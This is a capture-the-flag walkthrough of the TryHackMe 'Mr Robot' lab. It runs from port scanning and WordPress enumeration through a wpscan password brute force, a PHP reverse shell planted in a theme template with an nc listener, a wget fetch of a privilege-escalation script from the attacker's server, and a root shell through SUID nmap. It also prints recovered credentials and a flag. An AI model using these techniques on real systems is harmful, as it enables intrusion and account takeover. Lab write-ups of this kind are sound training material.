TryHackMe Mr Robot  CTF Walkthrough

This is my walkthrough for Mr-Robot

About TryHackMe

TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.

About Mr Robot machine

Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.

Scanning

Nmap

nmap 10.10.104.75 -sCV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-13 10:34 WAT
Nmap scan report for 10.10.104.75
Host is up (0.18s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Enumeration

The open ports I focused on enumerating:

80 tcp
43 tcp

Web server port 80

On visiting the web page I found a website with an animation displayed in reference to the Mr Robot tv series. The animation ends at a screen which resembles a Linux terminal with a blinking cursor.

 

the first thing I do when I’m enumerating a webpage is to check robots.txt.
On checking /robots.txt file, I found an interesting wordlist and key file.


fsocity.dic and key-1-of-3.txt

inputting key-1-of-3.txt in the URL, I got my 1st key:
073403c8a58a1f80d943455fb30724b9

I downloaded the “fsocity.dic” wordlist file for later use.

The wordlist has about 858160 lines of words and some of the words have duplicates in the wordlist, I sorted the words:
sort fsocity.dic -u > sort fsocity.dic

After looking around I could not find any useful thing on the site I decided to use Gobuster to enumerate the web directory.

Web Directory Enumeration

gobuster -u http://10.10.104.75 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403

Gobuster gave me more directories, observing the directory list shows that the website runs on WordPress.

.

WordPress Enumeration

I started enumerating the wp pages but could not find anything interesting, so I jump to the login page "/wp-login".

Tried login in with default credentials admin: admin, admin: password, but the login attempts failed. After a long time of enumerating the username, I found Elliot to be a valid user (got that from the Mr Robot television series character Elliot Alderson ).

when I entered a wrong user I get invalid user and wrong pass.

When I entered elliot I got valid user but wrong pass.

 

Remember I downloaded a wordlist earlier, I used it and brute-force password of the username elliot.

Bruteforcing user (elliot)

Using wpscan and the wordlist I found earlier, I got the login creds :

wpscan --url http://10.10.104.75/ -U elliot -P ~/Downloads/fsocity.dic

Elliot
ER28-0652

 

Reverse shell

I was able to log into wp-admin using the creds I found.

Using WordPress admin privilege which the user “elliot” has, we can get a reverse shell:

WordPress: Reverse Shell

steps for resetting WordPress reverse shell:

  1. goto appearance/editor/ 404 template and replace the php code with php reverse shellYou can get it here:http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  2. Edited the following lines of php-reverse-shell.php with my local IP and reverse shell port 443:
    • $ip = '127.0.0.1'; // CHANGE THIS
      $port = 1234; // CHANGE THIS

  3. updated the script (save)
  4. Started ncat listener on my system with same port here as I specified in the script 443
  5. nc -lvp 443
  6. visit the “/404” error page to trigger the reverse shell. “http://10.10.104.75/404.php

I got limited shell as Daemon:

Spawn a TTY Shell

upgraded my shell to tty shell, this will enable me to interact more with the shell:

python3 -c “import pty; pty.spawn(‘/bin/sh’)”;

export TERM=xterm

 

Daemon shell does not have the privilege to access all the directories and files but can navigate some of the file systems. I moved to /home/ directory, found another directory for the user robot.  Robot, directory has 2 files.

One is the 2nd key, the other file is an md5 password hash for the user robot.

Daemon does not have read permission for key-2-of-3.txt, I can only read the key as Robot. However, I have read permission for the password.raw-md5 file, I cat the password file and got robot password md5 hash string. I cracked it on https://crackstation.net/ and obtained the password for the user robot.

User Robot

Using the password I obtain from the has I successfully logged in as robot and got the 2nd flag:
su robot and input password

 

Root Shell

The first thing I do when enumerating a machine for root shell is to check things I can do using sudo -l.
I tried sudo -l , with no luck, I can’t run any sudo cmd.

Privilege Escalation Script

Using python server I was able to transfer lse.sh a Linux privilege escalation script to the machine.

steps I used for that:

  1. I cd into the dir where my lse.sh script is, run python -m SimpleHTTPServer 8000 on my machine to start the python server.
  2. On Mr robot machine, I cd into /tmp directory and run wget 10. * . * . * :8000/lse.sh (http://IP:8000/les.sh).
  3. chmod +x lse.sh
  4. run ./lse.sh

After enumerating with lse.sh, from the result I found Nmap running as SUID in the machine, that’s interesting.

Checking gtfobins we can see how to leverage on nmap to get root.

I ran the commands and got a root shell

  • nmap --interactive
  • !sh

 

As root, I can move into any directory or run any command without restrictions.

I moved to /root/ directory and obtained the 3rd key

This is the end.

Thanks for reading this write-up. Stay tuned and follow me on twitter to receive updates on more write-ups and thoughts on information security concepts.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments